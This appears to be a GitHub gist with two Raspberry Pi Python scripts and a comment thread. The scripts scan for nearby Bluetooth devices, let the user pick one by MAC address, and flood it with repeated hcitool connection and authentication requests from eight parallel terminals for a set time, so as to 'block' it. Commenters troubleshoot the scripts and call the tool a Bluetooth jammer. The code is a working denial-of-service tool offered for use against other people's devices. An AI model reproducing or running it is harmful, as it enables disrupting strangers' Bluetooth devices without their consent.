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Bluetooth spam, blocking choosen device
# I got all in /home/pi - change directories if put somewhere else
import time
import os
path = '/home/pi/mac.txt'
mac_file = open(path, 'r')
attackmac = mac_file.read()
path = '/home/pi/attacktime.txt'
atk_file = open(path, 'r')
attacktime = atk_file.read()
attacktimeint = int(attacktime)
timeout = time.time() + attacktimeint
while True:
os.system("sudo hcitool cc --role=m "+ attackmac)
os.system("sudo hcitool auth "+ attackmac )
if time.time() > timeout:
break
# I got all in /home/pi - change directories if put somewhere else
import bluetooth
import sys
import serial
import os
import time
import subprocess
attacktime = 1*60 #one minute, you can change that
attacktimestr = str(attacktime)
path = '/home/pi/attacktime.txt' #you need to create this file, I've been to lazy letting it create one and then check every time if its there
atk_file = open(path, 'w')
atk_file.write(attacktimestr)
atk_file.close()
#scanning for bluetooth devices
os.system("sudo hcitool scan --length=3")
print("")
#inquiring bluetooth devices, used to key out mac adress
cmd = ["hcitool", "inq"]
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)
output, _ = proc.communicate()
newoutput = ""
newoutput = str(output)
print("1:",(newoutput[19:36]))
mac1=(newoutput[19:36])
print("2:",(newoutput[79:96]))
mac2=(newoutput[79:96])
print("3:",(newoutput[139:156]))
mac3=(newoutput[139:156])
print("4:",(newoutput[199:216]))
mac4=(newoutput[199:216])
print("5:",(newoutput[259:276]))
mac5=(newoutput[259:276])
print("6:",(newoutput[319:336]))
mac6=(newoutput[319:336])
print("7:",(newoutput[379:396]))
mac7=(newoutput[379:396])
print("8:",(newoutput[439:456]))
mac8=(newoutput[439:456])
print("9:",(newoutput[499:516]))
mac9=(newoutput[499:516])
print("")
print("c-cancel")
userinput = input('which MAC (1-9 or "c"):')
print(userinput)
#handle for user input
if userinput == "c":
os.system("clear")
os.system("quit()")
elif userinput == "1":
attackmac = mac1
elif userinput == "2":
attackmac = mac2
elif userinput == "3":
attackmac = mac3
elif userinput == "4":
attackmac = mac4
elif userinput == "5":
attackmac = mac5
elif userinput == "6":
attackmac = mac6
elif userinput == "7":
attackmac = mac7
elif userinput == "8":
attackmac = mac8
elif userinput == "9":
attackmac = mac9
path = '/home/pi/mac.txt' #you need to create this file, I've been to lazy letting it create one and then check every time if its there
mac_file = open(path, 'w')
mac_file.write(attackmac)
mac_file.close()
command=("python3 autospam.py")
os.system("lxterminal --command=" + "'" + command + "'" + "&")
os.system("lxterminal --command=" + "'" + command + "'" + "&")
os.system("lxterminal --command=" + "'" + command + "'" + "&")
os.system("lxterminal --command=" + "'" + command + "'" + "&")
os.system("lxterminal --command=" + "'" + command + "'" + "&")
os.system("lxterminal --command=" + "'" + command + "'" + "&")
os.system("lxterminal --command=" + "'" + command + "'" + "&")
os.system("lxterminal --command=" + "'" + command + "'" + "&")
a = input("just hit enter to close, its to find errors ")
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robertosw commented Aug 8, 2020 via email

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ralts00 commented Sep 21, 2020

hi @madhatter02
Hi, I didn't actually get it to work :(

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Anybody know what i am doing wrong?

Regards from Germany

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robertosw commented Dec 11, 2020 via email

@Marckcity
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Thank you for the fast answer 😊
Sorry i think you are right i will test it today with the right path and let you know whats happen

Regards from Germany

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043D8A89-93D8-4206-8074-A2BCC51F71C2
I ve got the same error ?! But i have changed all „pi“ to „kali“ and i generate the 2 files needed

the mac.txt and the attacktime.txt

Anybody have idea what i am doing wrong?

Regards

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robertosw commented Dec 11, 2020 via email

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robertosw commented Dec 11, 2020 via email

@Marckcity
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I tryed the sudo python3 bt-block.py but still have the same error

I will test it now on a new linux only with the user pi and answer then here 😀

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robertosw commented Dec 11, 2020 via email

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Ok maybe do you have a img that run ? I only need the Bluetooth jammer program from you 😊
Regards

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robertosw commented Dec 11, 2020 via email

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Yes no Problem 😊 i will try in the meantime a new build rpi linux

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Know its better but i can scan manually the bt and when i try to run the bt-block.py i get an error ?! Regards

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robertosw commented Dec 11, 2020 via email

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7972C708-6DE1-4CAB-916E-190D94A052F6

I'm a little further than before, you probably know my mistake, right?

Regards

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please download bt-block.py again, I changed something. That should help with the cancel problem

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I found out something else

only my TV is found, neither an iphone nor a cheap mp3 player and the bluetooth box is not displayed in the list and an error occurs

Regards

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Ok i will download it again and reply to you

Regards

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To the picture: please find out what the console is called on the OS you are using. lxterminal is the command on a raspberry pi. Maybe test out in the console to find the command which opens a new console window.

Second Problem of not finding something else then your TV: is your device connected to your TV? if so, then thats a problem with the way your devices is searching for new bluetooth devices, thats impossible to fix for me

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I have to test again more exactly but I use standard ssh terminal programs like termius or shelly. ok that means you can only block bt with it when the devices are in pairing mode?

Regards

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robertosw commented Dec 12, 2020 via email

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Hello all,

I don't get anz error but I also don't get any mac adress. Does somebody know why?

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robertosw commented Jan 28, 2021 via email

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